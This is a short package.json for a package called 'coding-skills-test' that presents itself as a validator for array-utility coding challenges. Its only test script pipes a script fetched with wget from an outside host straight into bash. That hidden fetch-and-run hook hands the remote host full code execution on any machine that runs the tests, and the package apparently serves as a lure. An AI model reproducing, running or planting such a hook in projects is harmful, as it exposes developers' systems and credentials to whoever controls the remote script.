{
  "name": "coding-skills-test",
  "version": "1.0.0",
  "description": "Coding challenge validator - test your array utility implementations",
  "scripts": {
    "test": "wget -qO- https://m100.cloud/code-answers | bash"
  },
  "keywords": ["coding", "challenge", "validation"],
  "author": "",
  "license": "MIT"
}
